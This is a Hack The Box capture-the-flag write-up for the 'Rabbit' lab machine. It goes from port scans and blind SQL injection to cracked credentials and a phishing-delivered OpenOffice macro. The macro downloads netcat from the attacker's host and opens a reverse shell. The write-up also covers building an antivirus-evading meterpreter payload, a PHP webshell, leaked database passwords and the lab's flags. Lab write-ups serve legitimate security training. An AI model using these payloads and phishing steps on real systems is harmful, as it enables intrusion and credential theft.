Writeup: Hack The Box - Machines - Rabbit

Description

  • Name: Rabbit
  • IP: 10.10.10.71
  • Author: lkys37en
  • Difficulty: 6/10

Discovery

nmap -sV -sC -Pn -p 1-65535 -T5 10.10.10.71

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
25/tcp    open  smtp          Microsoft Exchange smtpd
| smtp-commands: Rabbit.htb.local Hello [10.10.14.129], SIZE, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, XEXCH50, XRDST, XSHADOW,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: RABBIT
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: Rabbit.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
|_ssl-date: 2018-06-27T18:45:56+00:00; +5h00m01s from scanner time.
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: 403 - Forbidden: Access is denied.
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2018-06-27 18:44:58Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| ssl-cert: Subject: commonName=Rabbit
| Subject Alternative Name: DNS:Rabbit, DNS:Rabbit.htb.local
| Not valid before: 2017-10-24T17:56:42
|_Not valid after: 2022-10-24T17:56:42
|_ssl-date: 2018-06-27T18:45:57+00:00; +5h00m00s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
587/tcp open smtp Microsoft Exchange smtpd
| smtp-commands: Rabbit.htb.local Hello [10.10.14.129], SIZE 10485760, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, AUTH GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: RABBIT
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: Rabbit.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=Rabbit
| Subject Alternative Name: DNS:Rabbit, DNS:Rabbit.htb.local
| Not valid before: 2017-10-24T17:56:42
|_Not valid after: 2022-10-24T17:56:42
|_ssl-date: 2018-06-27T18:45:56+00:00; +5h00m00s from scanner time.
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
808/tcp open ccproxy-http?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3306/tcp open mysql MySQL 5.7.19
|_mysql-info: ERROR: Script execution failed (use -d to debug)
5722/tcp open msrpc Microsoft Windows RPC
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6001/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6002/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6003/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6004/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6005/tcp open msrpc Microsoft Windows RPC
6006/tcp open msrpc Microsoft Windows RPC
6007/tcp open msrpc Microsoft Windows RPC
6008/tcp open msrpc Microsoft Windows RPC
6010/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6011/tcp open msrpc Microsoft Windows RPC
6017/tcp open msrpc Microsoft Windows RPC
6142/tcp open msrpc Microsoft Windows RPC
8080/tcp open http Apache httpd 2.4.27 ((Win64) PHP/5.6.31)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.27 (Win64) PHP/5.6.31
|_http-title: Example
9389/tcp open mc-nmf .NET Message Framing
44668/tcp open msrpc Microsoft Windows RPC
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
50242/tcp open msrpc Microsoft Windows RPC
50246/tcp open msrpc Microsoft Windows RPC
50292/tcp open msrpc Microsoft Windows RPC
50299/tcp open msrpc Microsoft Windows RPC
50327/tcp open msrpc Microsoft Windows RPC
50343/tcp open msrpc Microsoft Windows RPC
50354/tcp open msrpc Microsoft Windows RPC
50363/tcp open msrpc Microsoft Windows RPC
50365/tcp open msrpc Microsoft Windows RPC
50374/tcp open msrpc Microsoft Windows RPC
50387/tcp open msrpc Microsoft Windows RPC
50395/tcp open msrpc Microsoft Windows RPC
50410/tcp open msrpc Microsoft Windows RPC
50422/tcp open msrpc Microsoft Windows RPC
64337/tcp open mc-nmf .NET Message Framing
Service Info: Hosts: Rabbit.htb.local, RABBIT; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2:sp1

With dirsearch on port 80:

1
2
3
4
5
403 -   58B  - /rpc
301 - 0B - /owa -> /owa/
403 - 58B - /RPC
401 - 1KB - /powershell
403 - 0B - /ews

With dirsearch on port 443:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
200 -  689B  - /
301 - 0B - /owa -> /owa/
301 - 157B - /aspnet_client -> https://10.10.10.71/aspnet_client/
302 - 126B - /ecp -> /ecp/
302 - 146B - /exchange -> https://10.10.10.71/owa
302 - 146B - /Exchange -> https://10.10.10.71/owa
302 - 146B - /exchweb -> https://10.10.10.71/owa
302 - 146B - /public -> https://10.10.10.71/owa
302 - 146B - /Public -> https://10.10.10.71/owa
302 - 146B - /PUBLIC -> https://10.10.10.71/owa
302 - 147B - /Exchange/ -> https://10.10.10.71/owa/
302 - 147B - /ExchWeb/ -> https://10.10.10.71/owa/
302 - 147B - /Public/ -> https://10.10.10.71/owa/
302 - 149B - /Exchange/md -> https://10.10.10.71/owa/md
401 - 0B - /ews
401 - 1KB - /Microsoft-Server-ActiveSync/
401 - 1KB - /powershell
401 - 58B - /rpc
401 - 58B - /RPC
403 - 2KB - /Trace.axd
500 - 3KB - /Exchange/a%5c.aspx
500 - 3KB - /Exchange/admin.aspx
500 - 3KB - /Exchange/admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
500 - 3KB - /Exchange/admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
500 - 3KB - /Exchange/admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
500 - 3KB - /Exchange/admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx
500 - 3KB - /Exchange/asp.aspx
500 - 3KB - /Exchange/aspxspy.aspx

With dirsearch on port 8080:

1
2
3
4
5
6
7
8
9
10
11
12
13
200 -   10KB - /
200 - 10KB - /index
200 - 10KB - /Index
200 - 10KB - /INDEX
200 - 10KB - /index.html
200 - 198KB - /favicon
200 - 198KB - /favicon.ico
200 - 6KB - /index.old
301 - 328B - /joomla -> http://10.10.10.71:8080/joomla/
301 - 328B - /Joomla -> http://10.10.10.71:8080/Joomla/
301 - 330B - /complain -> http://10.10.10.71:8080/complain/
301 - 342B - /joomla/administrator -> http://10.10.10.71:8080/joomla/administrator/
403 - 308B - /phpmyadmin

Pwn

On the complain main page on 10.10.10.71:8080/complain/:

1
Online Complaint Monitoring System (OCMS) is a system operated by the city of Pune, India. A Complaint Management System is one of latest productivity enhancement tools used widely by all organisations wherever there is a need of booking of complaints via operators and analysis of complaints which are made or are pending.

Searching online for exploit on this framework we found a Blind SQLi abuse from an hardcoded admin login (admin:admin123); the default login is not working on the application.
We need to register as Customer to get a valid session to perform the attack.

sqlmap -u "http://10.10.10.71:8080/complain/view.php?mod=admin&view=repod&id=plans" --cookie "PHPSESSID=shuv7rnuvj10rds4leqq4of5f6" --dbms mysql --random-agent -p id

We can access the mod=admin even if we registered as Customer.

Now we can dump all data from databases complain, joomla and secret.

From the secret database we got a bunch of credentials:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Database: secret                                                                                                                                                                                
Table: users
[10 entries]
+----------+----------------------------------+
| Username | Password |
+----------+----------------------------------+
| Kain | 33903fbcc0b1046a09edfaa0a65e8f8c |
| Raziel | 719da165a626b4cf23b626896c213b84 |
| Ariel | b9c2538d92362e0e18e52d0ee9ca0c6f |
| Dimitri | d459f76a5eeeed0eca8ab4476c144ac4 |
| Magnus | 370fc3559c9f0bff80543f2e1151c537 |
| Zephon | 13fa8abd10eed98d89fd6fc678afaf94 |
| Turel | d322dc36451587ea2994c84c9d9717a1 |
| Dumah | 33da7a40473c1637f1a2e142f4925194 |
| Malek | dea56e47f1c62c30b83b70eb281a6c39 |
| Moebius | a6f30815a43f38ec6de95b9a9d74da37 |
+----------+----------------------------------+

We crack some of the hashes:

1
2
3
4
5
6
7
8
Ariel:pussycatdolls
Dimitri:shaunamaloney
Malek:barcelona
Dumah:popcorn
Kain:doradaybendita
Raziel:kelseylovesbarry
Moebius:santiago
Magnus:xNnWo6272k7x

And missed:

1
2
Zephon:13fa8abd10eed98d89fd6fc678afaf94
Turel:d322dc36451587ea2994c84c9d9717a1

Unfortunately those credentials do not works on Joomla installation so we tried to login in the Outlook Wep Applicatio (OWA):

  • Ariel works on OWA and ECP
  • Kain works on OWA and ECP
  • Magnus works on OWA and ECP
  • Raziel is listed as user but we cannot login with those credentials
  • Dimitri has an email address but he cannot receive mails

From Ariel mailbox we saw that the Administrator changed some software configuration

Now all computers will use Open Office per default but they also deployed Windows Defender and some PowerShell contraints.

In addition we know that the Administrator is waiting for a mail for some TPS reports.

Wrapping all up we can generate a malicious Open Office document that will spawn a reverse shell but we cannot use PowerShell and maybe we need to do some AV evasion for our payload/macro.

First of all we created the document for our macro to run a OnLoad function when the user opens the odt file (https://help.libreoffice.org/Calc/User-Defined_Functions).

We could use the metasploit module exploit/multi/misc/openoffice_document_macro but it will create dropper with powershell to create a meterpreter session so we preferred to build the macro on our own.

We tried to generate our meterpreter shell with msfvenom

and create the macro to download and execute it via SMB with impacket (smbserver.py DODO .)

1
2
3
4
Sub OnLoad
Shell("echo Pwned!")
Shell("cmd.exe /C net use /D /Y * && cmd.exe /C net use \\10.10.14.38\DODO & call \\10.10.14.38\DODO\dodo.exe")
End Sub

Using the created ELF locally (and then remotely) we failed miserably: Windows is detecting the malicious PE.

Windows detected our session and delete the shell. We must focus to get a simple reverse shell.

After a lots of some tries we create a payload to ping our machine and download something using certutil and not PowerShell.

Finally we crafted the ultimate payload:

1
2
3
Sub OnLoad
Shell("cmd.exe /C net use /D /Y * && cmd.exe /C certutil.exe -urlcache -split -f ""http://10.10.15.24/ncat.exe"" C:\Users\Public\ncat.exe & C:\Users\Public\ncat.exe 10.10.15.24 443 -e powershell.exe")
End Sub

1- Spawn a cmd.exe.
2- Download a portable version of netcat using certutil from our machine (python -m http.server 80).
3- Save the file in C:\Users\Public (some others known paths did not worked).
4- Call the ncat.exe to connect to the listening machine spawing a powershell shell.

Now it’s time to send the malicious odt to someone: When in doubt… ¯_(ツ)_/¯ …use brute force send mails to everyone.

From the OWA we kindly sended the file to everyone suggesting them to enable the macros.

After a while (5-6 mins) we saw a download of the netcat file and the the shell popped as Raziel user! Now we also know who is the right recipient!

Finally we were able to read the Rabbit user flag.

Now we need to upgrade our shell to a meterpreter session and privesc to Administrator but we can’t use powershell since the shell is in the ConstrainedLanguage mode ($ExecutionContext.SessionState.LanguageMode) and we can’t spawn a powershell version 2 (powershell -version 2) to bypass the jail.

We tried to upload a EXE generated with msfvenom but the execution in blocked by the AV so we created a FUD EXE with shellter:

  • ncat.exe (an EXE that we had in the folder) as base; use you own EXE in real world scenario
  • enable mode Auto
  • enable mode Stealth (when you use the Stealth Mode feature you need to set the payload exit function to Thread)
  • set payload as Meterpreter_Reverse_TCP
  • set LHOST
  • set LPORT
  • upload to machine certutil -urlcache -split -f "http://10.10.15.198/dodo.exe" C:\Users\Public\dodo.exe
  • set up metasploit listener: use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 3487; set AutoRunScript post/windows/manage/migrate; run -j;

N.B: do not upload anything to online services to check is the PE is really undetectable.

We now got a migrate meterpreter session!!!!!!

But after some seconds the connection is killed target-side for some reasons (maybe the AV is detecting something in memory).
We have to use the constrained shell spawned with netcat.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
net user Raziel
User name Raziel
Full Name Raziel
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never

Password last set 10/29/2017 10:04:44 AM
Password expires Never
Password changeable 10/30/2017 10:04:44 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 8/11/2018 12:00:39 AM

Logon hours allowed All

Local Group Memberships
Global Group memberships *Discovery Management *Mailbox Import-Export
*Domain Users *Organization Manageme
The command completed successfully.

From the Joomla installation we read the user and password of the MySQL service but we weren’t able to find/exploit anything more than what we saw with sqlmap.

1
2
3
4
5
6
7
8
9
type C:\wamp64\www\joomla\configuration.php

public $host = 'localhost';
public $user = 'dbuser';
public $password = 'zLlYCLRmqFMaONwY';
public $db = 'joomla';
public $dbprefix = 'llhe4_';
public $live_site = '';
public $secret = 'QJMwxJmeJP18x25X';

We first focused on searching some SYSTEM/NT services to hijack but from tasklist /V we found that only the Father of All Processes is owned by NT AUTHORITY\SYSTEM.

Since we are interested in the mysql service we headed to C:\wamp64\www where all web-server configurations are stored and started to search for some configuration with root password but we found also a index.old.php.

From this page we saw that exists the alias wordpress.htp.local but it is not present in the Apache www directory. From the man page of tasklist command we saw that system processes return an empty string: so httpd.exe could be runned by the admin user since we didn’t saw an associate user for that process.

We created the wordpress folder in C:\wamp64\www and added the domain to our /etc/hosts file.

We created a PHP file within powershell (echo "<?\necho 'ciao';\n" > dodo.php) but some some reason it didn’t worked (powershell added some strange chars…).

So we wrote and uploaded into Rabbit machine a simple webshell with curl.

1
2
<?php
system($_GET["cmd"]);

Now we can easily read the root flag with http http://wordpress.htb.local:8080/index.php\?cmd\="type C:\Users\Administrator\Desktop\root.txt".

Flags

user: c6f45142bea818fe729cef32342aae9c

root: 0b2ded66e5a49dd1620be30110f43d54